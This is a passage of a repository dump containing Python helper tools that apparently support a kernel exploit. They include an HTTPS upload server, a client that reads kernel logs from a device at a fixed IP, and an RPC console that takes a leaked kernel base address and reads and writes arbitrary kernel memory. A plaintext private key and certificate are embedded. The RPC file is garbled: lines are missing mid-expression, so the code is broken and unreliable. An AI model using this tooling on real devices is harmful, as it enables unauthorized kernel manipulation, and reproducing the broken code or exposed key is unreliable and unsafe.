27 | data = self.rfile.read(int(self.headers['Content-length']))
28 | open("%s"%fn, "wb").write(data)
29 |
30 |
31 | server_address = ('0.0.0.0', 443)
32 | httpd = HTTPServer(server_address, RequestHandler) #http.server.SimpleHTTPRequestHandler)
33 | httpd.socket = ssl.wrap_socket(httpd.socket, server_side=True, certfile='localhost.pem', ssl_version=ssl.PROTOCOL_TLS)
34 | print('running server')
35 | httpd.serve_forever()
36 |
--------------------------------------------------------------------------------
/klogclient.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import time
3 | import struct
4 | import locale
5 | import sys
6 |
7 | def recv_klog():
8 | host = '10.0.0.169'
9 | port = 9081
10 |
11 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
12 | s.connect((host, port))
13 | while True:
14 | try:
15 | data = s.recv(0x100)
16 | if not data:
17 | break
18 | print(data.decode('utf-8'))
19 | except socket.timeout:
20 | print("[ERROR] Timeout reached for receiving data (1 min)\n")
21 | break
22 | except socket.error:
23 | print("[ERROR] Failed to read from socket\n")
24 | break
25 |
26 | s.close()
27 |
28 | if __name__ == '__main__':
29 | recv_klog()
--------------------------------------------------------------------------------
/localhost.pem:
--------------------------------------------------------------------------------
1 | -----BEGIN PRIVATE KEY-----
2 | MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDqk9QPVMjDyho0
3 | OoS5ZWJa+qZXjuTJCHXRnZstZvmw8jCfvBK5r9+UiSIItVfUChrDczsDAxsFlony
4 | y4wO3IXDoaONq9qPko3J96NgRW7sUIT01qSrI2de7xQXvL4ztVwSUDjz86pqfqTC
5 | LWIVSnKXlPXXr3t+YOMSI0l5DaJrfnYlUHufIMrKSsWGDNMizG2ufmGNZ2nlUeFV
6 | Bi16Obn0KI5BWAi7qtC+s7lqzFJzSp0XIfVpT0iqpoEbvfIoC/VSo3MsBPnqvuW2
7 | 9rkboDmS462Ffju35yrzL9P707hcP/3ZVrFgOeFh0ae1gwAu2KszTcgIjkICCgeL
8 | FpfYFspDAgMBAAECggEAHllX40/l1abtMvqrN01Np1WsdcGQCg5lJ+SLMhmTjngX
9 | IGN1zL5bX91KIPRNU6qnAciDxwT81wE+AcKh8T5ItCHShj7IvTCJ1aqLYaY6Dqrw
10 | OLkYfufKtPabk+KgfRImwlvMsotA7hxKdrDmcri6ELB+ChSzFou0dSFJnTbNX7iy
11 | YXZ8e+09V8JT7PpPSnEsTtmpsGVw7K3fqodpUH3lbZZ3fE+YzyZo0ddmBpLTOQ9I
12 | L8w5fBXtqJ130JCHJt5icCeNtBG1Qtl3rjQAsSyQHlE6tR3X3OVWm+WyjJ3fMtaW
13 | YDCHUBF28UQCNDub57km6ABpPv2NUHuTyb4hqXEaeQKBgQD83gqlyGIfUdqDWfwn
14 | vBt67CYFKz0K4lGNlBp697grtTMGdmwSKz8pWnEPuLPp3fMiLSqa3iqPDlkEn0yf
15 | 8zYQNS2+DEjKdfo+xmfecbsWmsSv6wn/qkBrIxPfWGiRY+Ymx/+o81ujYDsA3xR9
16 | +qFOStMb6LA7BBBE3pKgh/q0/wKBgQDte8f3KJqz5OYjdRfRJiBOB5OsHo+oCwnb
17 | hBS7uKoi7ZgdCiRMWRJQ4iARC2iTN+GpnnFpkeTgTPQia/KFs87SG55KSPccU93o
18 | Me8Mv0stcxVjhZrSJZZ13XHmQeKJtR6JPSbccoVTY/TOn6spIHgEBHzt5rgv7oU9
19 | i/DERU7WvQKBgDTfHGzTfCi+TakfPIj2XOyTydNU2huXfKPUrsC9YQXKilO0mR4n
20 | arpzzaYS4ZNps/eWaA0fnNhykIxV3oinKsuywtC08tdaWaucgoVRVGQCklOSGnIZ
21 | oASGvhX5/0s/DxVWxg8Ga0e6zDt/aWJ58BZVsNRqD8cXL2um+hOUuwfzAoGBAJWh
22 | sVvkhJ0mc28R3yDTwfUIRx5i3ycFVX+vmBSzhNefFoHtmvNUB/tYjtXOd2STCCeE
23 | gnb/CtPdCNILa/KcWYr/BdxOXwzFNwOPOsywVyDa6zYav3L7ZfL7xUFMb/1OVmAo
24 | XKz3p1PkniH2brTqFVSKs2B+R71Dr0YZP2mbNdKNAoGAD9B7YY2gh/FkV6IyQoLD
25 | KtyOzFyxBVBQDMPbB8aDQ7e543k9ippw9+NSrgSi1ExJgNkXmsnOv8puKQXIZBhT
26 | c2mKm8hN0n0kuHcY7oafH4oDZwg/gNRdUipj+b9YmZvRF19lQDJcu8ypCJIYlrmW
27 | Q3exZadcsdo6FIhX0TMC3MQ=
28 | -----END PRIVATE KEY-----
29 | -----BEGIN CERTIFICATE-----
30 | MIIDazCCAlOgAwIBAgIUP2elq/Fe+kh4ijoErvu7DNCaB0gwDQYJKoZIhvcNAQEL
31 | BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
32 | GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0yMjEwMDIxNzIxNDdaFw0zMjA5
33 | MjkxNzIxNDdaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw
34 | HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB
35 | AQUAA4IBDwAwggEKAoIBAQDqk9QPVMjDyho0OoS5ZWJa+qZXjuTJCHXRnZstZvmw
36 | 8jCfvBK5r9+UiSIItVfUChrDczsDAxsFlonyy4wO3IXDoaONq9qPko3J96NgRW7s
37 | UIT01qSrI2de7xQXvL4ztVwSUDjz86pqfqTCLWIVSnKXlPXXr3t+YOMSI0l5DaJr
38 | fnYlUHufIMrKSsWGDNMizG2ufmGNZ2nlUeFVBi16Obn0KI5BWAi7qtC+s7lqzFJz
39 | Sp0XIfVpT0iqpoEbvfIoC/VSo3MsBPnqvuW29rkboDmS462Ffju35yrzL9P707hc
40 | P/3ZVrFgOeFh0ae1gwAu2KszTcgIjkICCgeLFpfYFspDAgMBAAGjUzBRMB0GA1Ud
41 | DgQWBBTqKkvNd3kGCYza6QYOiiVKcIMRFjAfBgNVHSMEGDAWgBTqKkvNd3kGCYza
42 | 6QYOiiVKcIMRFjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQBE
43 | ozTxC6Str6YDCSTmFQxFo55aP0we9aqnp4LI9lsjYQ5U3pWDi8jROsidHrc4grVe
44 | cK9263KPUok/zk61Jzb2Ik9+ZrFEpOTpQngMr8lyygF8WW2GuYaepdXCU9pjhgPX
45 | kKX/DGwaCC4pj+BjF2NH2LgXobEUN0cIRTm/+1yIykB5LR24GXZKgKsUn58brXKL
46 | So2fWhioCZcNA2grUYiWuFTP6ubV6/e9SIqzTwGyLvuhR7gPvWFLkY8PoIXD/sVC
47 | SFcifNhD/HnjveQm3bj8+/IR9BQ+BkDVEpKMOmR1chdYkZVKiVKSLyQkRlVfZemq
48 | IU4gqkeHqU1CJtB+PfRT
49 | -----END CERTIFICATE-----
50 |
--------------------------------------------------------------------------------
/logserver.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import time
3 | import struct
4 | import locale
5 |
6 | def server_program():
7 | host = '0.0.0.0'
8 | port = 5655
9 |
10 | server_socket = socket.socket()
11 | server_socket.bind((host, port))
12 |
13 | server_socket.listen(1)
14 | conn, address = server_socket.accept() # accept new connection
15 | conn.settimeout(60) # 60 second timeout
16 | print("Connection from: " + str(address))
17 |
18 | while True:
19 | try:
20 | data = conn.recv(0x100)
21 | if not data:
22 | return
23 | print("[LOG] " + data.decode('utf-8'))
24 | except socket.timeout:
25 | print("[LOG] [ERROR] Timeout reached for receiving data (1 min)\n")
26 | return
27 | except socket.error:
28 | print("[LOG] [ERROR] Failed to read from socket\n")
29 | return
30 |
31 | conn.close()
32 |
33 | if __name__ == '__main__':
34 | server_program()
--------------------------------------------------------------------------------
/rpcserver.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import time
3 | import struct
4 | import locale
5 |
6 | def rpc_server():
7 | host = '0.0.0.0'
8 | port = 5657
9 |
10 | server_socket = socket.socket()
11 | server_socket.bind((host, port))
12 |
13 | server_socket.listen(1)
14 | conn, address = server_socket.accept() # accept new connection
15 | conn.settimeout(600) # 10 minute timeout
16 |
17 | print("[RPC] Connection from: " + str(address))
18 |
19 | # First, receive the kernel data base address
20 | try:
21 | data = conn.recv(0x100)
22 | if not data:
23 | return
24 | print("[RPC] Received kernel .data base: 0x" + data.decode('utf-8'))
25 | except socket.timeout:
26 | print("Timeout reached for receiving data (1 min)")
27 | return
28 |
29 | # Now, process cmds
30 | cmd = ''
31 | while True:
32 | print("> ", end = '')
33 | cmd = input()
34 |
35 | cmd_parts = cmd.split(' ')
36 |
37 | if cmd_parts[0] == "r" or cmd_parts[0] == "read":
38 | if len(cmd_parts) < 2:
39 | print("Usage: r [addr]")
40 | continue
41 |
42 | read_addr = cmd_parts[1]
43 | read_addr = read_addr.replace("0x", "")
44 |
45 | if len(read_addr) < 16:
46 | print("Usage: r [addr]")
47 | continue
48 |
49 | read_addr_hi = int(read_addr[:8], 16)
50 | read_addr_low = int(read_addr[8:], 16)
51 | read_addr_bin = struct.pack(" 8:
83 | write_val_hi = int(write_val[:8], 16)
84 | write_val_low = int(write_val[8:], 16)
85 | else:
86 | write_val_low = int(write_val, 16)
87 |
88 | write_val_bin = struct.pack("